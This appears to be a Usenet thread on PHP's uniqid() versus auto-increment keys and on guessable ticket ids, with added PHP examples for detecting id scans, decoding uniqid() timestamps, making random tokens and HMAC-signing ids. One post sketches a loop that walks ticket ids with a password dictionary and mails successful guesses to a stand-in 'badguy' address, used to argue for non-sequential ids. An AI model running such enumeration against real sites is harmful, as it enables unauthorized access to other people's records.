Does using uniqid seem a reasonable way of generating a unique row
identifier in a db table? It's *highly* unlikely that two ids are
going to be generated in the same microsecond, but if they are,
setting lcg as true should eliminate any problems I'd have thought.
Anyway, these are my thoughts, do people agree?
MrBoom wrote:
> Does using uniqid seem a reasonable way of generating a unique row
> identifier in a db table? It's *highly* unlikely that two ids are
> going to be generated in the same microsecond, but if they are,
> setting lcg as true should eliminate any problems I'd have thought.
> Anyway, these are my thoughts, do people agree?
Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?
André Næss
Shawn Wilson wrote:
> André Næss wrote:
>> MrBoom wrote:
>>> Does using uniqid seem a reasonable way of generating a unique row
>>> identifier in a db table? It's *highly* unlikely that two ids are
>>> going to be generated in the same microsecond, but if they are,
>>> setting lcg as true should eliminate any problems I'd have thought.
>>> Anyway, these are my thoughts, do people agree?
>> Why would you want to do that when an auto-incrementing number is
>> *guaranteed* to be unique and is much simpler?
> I've done this before when I wanted unique ids that couldn't be easily
> guessed by potential hackers, or where I didn't want to give away the
> size of a database.
Then start the incrementing number at 1122342345365 :)
But in the end you should strive to find good keys. I'm currently working on
importing data from an external datasource into an existing webshop. If
both systems had actually used natural keys this wouldn't be hard, but due
to the current use of surrogate keys it's a real pain.
André Næss
André Næss wrote:
> Shawn Wilson wrote:
>> André Næss wrote:
>>> MrBoom wrote:
>>>> Does using uniqid seem a reasonable way of generating a unique row
>>>> identifier in a db table? It's *highly* unlikely that two ids are
>>>> going to be generated in the same microsecond, but if they are,
>>>> setting lcg as true should eliminate any problems I'd have thought.
>>>> Anyway, these are my thoughts, do people agree?
>>> Why would you want to do that when an auto-incrementing number is
>>> *guaranteed* to be unique and is much simpler?
>> I've done this before when I wanted unique ids that couldn't be easily
>> guessed by potential hackers, or where I didn't want to give away the
>> size of a database.
> Then start the incrementing number at 1122342345365 :)
Still gives away volume of tickets over time and makes ids guessable by
hackers. I'm not super-paranoid or anything, but I prefer to give people no
information by default, then give them just what they need, rather than give
them everything, then take away what's a security risk.

http://domain.com/support.php?ticketid=1122342345365
...a week goes by...
http://domain.com/support.php?ticketid=1122342345372
= 7 tickets per week
Or, if you were trying to read other people's tickets (or whatever else), you
could do something like this:
for ($i = 1122342345365; $i < 1122342345465; ++$i) {
    foreach ($arrDictionary as $word) {
        // is_real_page() stands for whatever check tells a real ticket page apart from an error page
        if (is_real_page("http://domain.com/support.php?ticketid=$i&password=$word")) {
            mail("ba****@badguy.com", "We're in", $i . " is a real ticket # with password $word");
        }
    }
}
This is obviously a simplistic example. Any decent system should have some kind
of reporting/blacklisting script set up for this kind of approach, but the point
is, if you're trying to get in it's a lot easier if you know the first step.
> But in the end you should strive to find good keys. I'm currently working on
> importing data from an external datasource into an existing webshop. If
> both systems had actually used natural keys this wouldn't be hard, but due
> to the current use of surrogate keys it's a real pain.
I would agree that if the key is unlikely to ever be presented to the user, then
the simpler the better. I just brought up the above examples as practical uses
for non-sequential unique ids.
Regards,
Shawn
--
Shawn Wilson sh***@glassgiant.com http://www.glassgiant.com
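Shawn mentions that "any decent system should have some kind of reporting/blacklisting script" for the pattern he sketches. The following is an added example of what such a script can look like, written for this thread rather than taken from any of its posters: it parses Apache-style access log lines for support.php, groups them by client address, and flags any client that touches many distinct ticketid values, or collects many rejected lookups, inside a short window. The log lines are constructed, the IP addresses come from the documentation ranges, and the thresholds (WINDOW_SECONDS, MAX_DISTINCT_IDS, MAX_FAILURES) are arbitrary choices for the demo. Assumes PHP 7.1 or later.

```php
<?php
// Added example (not from the thread): a log scanner that reports clients
// walking the ticketid space. Thresholds below are illustrative only.

const WINDOW_SECONDS   = 600;  // inspect requests that fall within 10 minutes of each other
const MAX_DISTINCT_IDS = 20;   // more distinct ticketids than this from one client looks like a scan
const MAX_FAILURES     = 10;   // so does more than this many rejected (4xx) lookups

/** Parse one Apache-style access log line; returns null for lines we do not care about. */
function parseLine(string $line): ?array
{
    // e.g. 192.0.2.10 - - [10/Mar/2004:12:00:01 +0000] "GET /support.php?ticketid=5&password=x HTTP/1.1" 403 512
    $re = '~^(\S+) \S+ \S+ \[([^\]]+)\] "GET /support\.php\?([^ "]*) HTTP/[\d.]+" (\d{3})~';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    parse_str($m[3], $query);
    $ts = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($ts === false || !isset($query['ticketid'])) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $ts->getTimestamp(),
            'ticketid' => (string) $query['ticketid'], 'status' => (int) $m[4]];
}

/** Returns [ip => reason] for every client whose requests look like an id scan. */
function findScanners(array $lines): array
{
    $byIp = [];
    foreach ($lines as $line) {
        if (($r = parseLine($line)) !== null) {
            $byIp[$r['ip']][] = $r;
        }
    }
    $flagged = [];
    foreach ($byIp as $ip => $reqs) {
        usort($reqs, function ($a, $b) { return $a['time'] <=> $b['time']; });
        $n = count($reqs);
        // Sliding window: starting at each request, look at what followed within WINDOW_SECONDS.
        for ($i = 0; $i < $n; $i++) {
            $ids = [];
            $failures = 0;
            for ($j = $i; $j < $n && $reqs[$j]['time'] - $reqs[$i]['time'] <= WINDOW_SECONDS; $j++) {
                $ids[$reqs[$j]['ticketid']] = true;
                if ($reqs[$j]['status'] >= 400) {
                    $failures++;
                }
            }
            if (count($ids) > MAX_DISTINCT_IDS) {
                $flagged[$ip] = count($ids) . ' distinct ticket ids within ' . WINDOW_SECONDS . 's';
                break;
            }
            if ($failures > MAX_FAILURES) {
                $flagged[$ip] = $failures . ' rejected lookups within ' . WINDOW_SECONDS . 's';
                break;
            }
        }
    }
    return $flagged;
}

// --- constructed sample log: one legitimate client, one client stepping through ids ---
$lines = [];
$base  = 1122342345365;   // the starting id used in the thread
$lines[] = '192.0.2.10 - - [10/Mar/2004:12:00:01 +0000] "GET /support.php?ticketid=' . $base
         . '&password=correct HTTP/1.1" 200 2048';
for ($k = 0; $k < 30; $k++) {
    $t = sprintf('10/Mar/2004:12:%02d:%02d +0000', intdiv($k, 60), $k % 60);
    $lines[] = '198.51.100.7 - - [' . $t . '] "GET /support.php?ticketid=' . ($base + $k)
             . '&password=123456 HTTP/1.1" 403 512';
}
print_r(findScanners($lines));
```

The output of findScanners() is the input to whatever action the site takes (a report mail, a temporary deny rule); the scanner itself only reads logs. Note that the distinct-id rule catches the sequential walk even when the application answers every request with the same status, which is what makes sequential ids easy to scan and easy to spot.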
I don't know about MySQL, but in MS SQL the increment can be greater than 1.
If you have a situation where you need to display private info without the
visitor logging in, I would take the primary key from the database, append a
string of random characters, then pass it through md5() or sha1() and store
the resulting hash in another column.
What you get from uniqid() isn't unguessable, since it's based on the system
time. All a potential hacker has to do is scan through the particular time
range during which the id might have been generated.
User "Shawn Wilson" <sh***@glassgiant.com> wrote in message news:40***************@glassgiant.com...
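Chung Leong's two points (uniqid() is time-based; a separate random token column is the fix) in code, as an added example that is not from any poster in this thread. decodeUniqid() reads the time back out of a plain uniqid() value: without a prefix it is 13 hex characters, the Unix seconds (8) followed by the microseconds (5), which is how the function is built rather than anything secret. makeAccessToken() builds the per-row token Chung describes (primary key, appended random characters, hashed); it uses random_bytes() for the random part and sha256 in place of md5()/sha1(), a swap from the thread that does not change the design, because the unguessability comes from the random input, not from the hash. findByToken() stands in for the database lookup on the token column. Assumes 64-bit PHP 7.1 or later; the $rows array is constructed.

```php
<?php
// Added example (not from the thread): why uniqid() is guessable, and the
// random per-row token Chung Leong suggests instead. Assumes 64-bit PHP >= 7.1.

/**
 * uniqid() with no prefix and lcg off is 8 hex digits of Unix seconds
 * followed by 5 hex digits of microseconds. One observed id therefore
 * pins the generation time down to the microsecond.
 */
function decodeUniqid(string $id): array
{
    if (!preg_match('/^([0-9a-f]{8})([0-9a-f]{5})/', $id, $m)) {
        throw new InvalidArgumentException("not a uniqid() value: $id");
    }
    return ['seconds' => hexdec($m[1]), 'microseconds' => hexdec($m[2])];
}

/**
 * Chung Leong's scheme: primary key + random characters, hashed, stored in
 * its own column. 16 random bytes (128 bits) make the search space far too
 * large to scan, whatever the hash.
 */
function makeAccessToken(int $primaryKey): string
{
    $random = bin2hex(random_bytes(16));
    return hash('sha256', $primaryKey . ':' . $random);
}

/** Constructed stand-in for "SELECT ... WHERE token = ?". */
function findByToken(array $rows, string $token): ?array
{
    foreach ($rows as $row) {
        // hash_equals() compares in constant time, so timing does not reveal partial matches.
        if (hash_equals($row['token'], $token)) {
            return $row;
        }
    }
    return null;
}

// --- demonstration ---
$id = uniqid();
$t  = decodeUniqid($id);
printf("uniqid %s encodes %s.%06d\n", $id, date('c', $t['seconds']), $t['microseconds']);

$rows = [];
foreach ([1122342345365, 1122342345366] as $pk) {   // ticket ids from the thread
    $rows[] = ['id' => $pk, 'token' => makeAccessToken($pk)];
}
// The URL carries the token; the sequential primary key never leaves the database.
printf("support.php?ticket=%s\n", $rows[0]['token']);
$hit  = findByToken($rows, $rows[0]['token']);
$miss = findByToken($rows, str_repeat('0', 64));
printf("lookup by real token -> id %s; lookup by bogus token -> %s\n",
       $hit['id'], $miss === null ? 'not found' : 'found');
```

Setting lcg (more_entropy) to true appends a few digits from lcg_value() to the same time-based string; it helps uniqueness, which is what uniqid() is designed for, but it is not a cryptographically secure source, so the random token column is still the right tool when the id must be unguessable.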
"Chung Leong" <ch***********@hotmail.com> wrote in message news:<FN********************@comcast.com>...
> What you get from uniqid() isn't unguessable, since it's based on the system
> time. All a potential hacker has to do is scan through the particular time
> range during which the id might have been generated.
But surely setting lcg as true would make it unguessable?
Chung Leong wrote:
> I don't know about MySQL, but in MS SQL the increment can be greater than 1.
Any size increment would be easy to spot by generating 2 or 3 requests in a
row (as in a ticket system).
> If you have a situation where you need to display private info without the
> visitor logging in, I would take the primary key from the database, append a
> string of random characters, then pass it through md5() or sha1() and store
> the resulting hash in another column.
Yes, that would be more secure. I'm not suggesting anyone ever use only
uniqid() in lieu of passwords. But if you just want a quick unique id to
prevent giving away information _easily_, I think it's a good choice. Use a
prefix, set lcg to true, and run it through md5() if it's very
private/important.
> What you get from uniqid() isn't unguessable, since it's based on the system
> time. All a potential hacker has to do is scan through the particular time
> range during which the id might have been generated.
Assuming they were trying to get a particular request and you didn't use lcg,
yes. But it still requires that they expend a lot of time just to get the first
step (knowing the id). The problem I have with incremental primary keys as
user-visible identifiers is that they give hackers a (potentially) huge number
of starting points. In other words, they could try the 10 most common passwords
on 1000 tickets/accounts/whatever. And they'd be likely to get one or more
hits.
Regards,
Shawn
--
Shawn Wilson sh***@glassgiant.com http://www.glassgiant.com
Shawn Wilson <sh***@glassgiant.com> wrote in message news:<40***************@glassgiant.com>...
> André Næss wrote:
>> Then start the incrementing number at 1122342345365 :)
> Still gives away volume of tickets over time and makes ids guessable by
> hackers. I'm not super-paranoid or anything, but I prefer to give people no
> information by default, then give them just what they need, rather than give
> them everything, then take away what's a security risk.
IMHO, avoiding an auto_incremented key is a mess. You might consider
encrypting the query string, e.g.:

    $fake_ticket_id = substr(md5($real_ticket_id), 0, 5)
                    . dechex($real_ticket_id)
                    . substr(md5($real_ticket_id), 5, 5);

In this case, we may get back $real_ticket_id from $fake_ticket_id and
can also check the validity of the query string.
--
"Success = 10% sweat + 90% tears"
If you live in USA, please support John Edwards.
Email: rrjanbiah-at-Y!com
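The scheme above is reversible and checkable, as the post says, but there is no secret in it: md5() of the id is something anyone can compute, so the check only proves the sender knows the layout. This added example (not from the thread) implements the posted scheme as encodeUnkeyed()/decodeUnkeyed() and puts a keyed variant beside it, encodeKeyed()/decodeKeyed(), which replaces the md5 fragments with a truncated HMAC under a server-side secret. The key value is a placeholder; the sample ids are the ones used in the thread. Assumes 64-bit PHP 7.1 or later.

```php
<?php
// Added example (not from the thread): the posted md5-checksum scheme next to
// an HMAC-based version. Assumes 64-bit PHP >= 7.1; the key below is a placeholder.

/** The scheme as posted: 5 hex chars of md5, the id in hex, 5 more hex chars of md5. */
function encodeUnkeyed(int $id): string
{
    $h = md5((string) $id);
    return substr($h, 0, 5) . dechex($id) . substr($h, 5, 5);
}

/** Recover the id and check the md5 fragments. Anyone who knows the layout can pass this. */
function decodeUnkeyed(string $fake): ?int
{
    if (!preg_match('/^[0-9a-f]{5}([0-9a-f]+)[0-9a-f]{5}$/', $fake, $m)) {
        return null;
    }
    $id = (int) hexdec($m[1]);
    return hash_equals(encodeUnkeyed($id), $fake) ? $id : null;
}

/** Keyed variant: the tag is hash_hmac() under a secret only the server holds. */
function encodeKeyed(int $id, string $key): string
{
    $tag = substr(hash_hmac('sha256', (string) $id, $key), 0, 16);   // 64-bit tag
    return dechex($id) . '.' . $tag;
}

/** Recover the id and verify the tag; fails for any id/tag pair not minted with the key. */
function decodeKeyed(string $token, string $key): ?int
{
    if (!preg_match('/^([0-9a-f]+)\.([0-9a-f]{16})$/', $token, $m)) {
        return null;
    }
    $id = (int) hexdec($m[1]);
    return hash_equals(encodeKeyed($id, $key), $token) ? $id : null;
}

// --- demonstration ---
$key  = 'PLACEHOLDER-server-secret';   // real deployments load this from configuration
$real = 1122342345365;

$fake = encodeUnkeyed($real);
printf("unkeyed %s -> %d\n", $fake, decodeUnkeyed($fake));
// No secret is involved, so a value built for the neighbouring id validates just as well:
printf("unkeyed check for id+1 passes: %s\n", decodeUnkeyed(encodeUnkeyed($real + 1)) === $real + 1 ? 'yes' : 'no');

$tok = encodeKeyed($real, $key);
printf("keyed   %s -> %d\n", $tok, decodeKeyed($tok, $key));
// Swapping the id part while keeping the old tag fails verification:
$tampered = dechex($real + 1) . substr($tok, strpos($tok, '.'));
printf("keyed check on tampered token: %s\n", decodeKeyed($tampered, $key) === null ? 'rejected' : 'accepted');
```

The keyed token stops forgery of the validity check, which is the property the post is after. It still carries the id in clear, so it does not address Shawn's other concern (volume over time is still visible); hiding that needs a random per-row token rather than an encoding of the sequential key.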
Don't know. The function is designed to guarantee uniqueness, not
randomness. For security purposes I prefer to use something that was
designed--and more importantly, was tested and analysed--with that in mind.
The primary key doesn't need to be random if you're not exposing it, that is
my point. If you need some kind of a random tracking string, then generate
one and stick it in the database.
User "MrBoom" <an************@hotmail.com> wrote in message
news:9b**************************@posting.google.com...
> "Chung Leong" <ch***********@hotmail.com> wrote in message
> news:<FN********************@comcast.com>...
>> What you get from uniqid() isn't unguessable, since it's based on the
>> system time. All a potential hacker has to do is scan through the particular
>> time range during which the id might have been generated.
> But surely setting lcg as true would make it unguessable?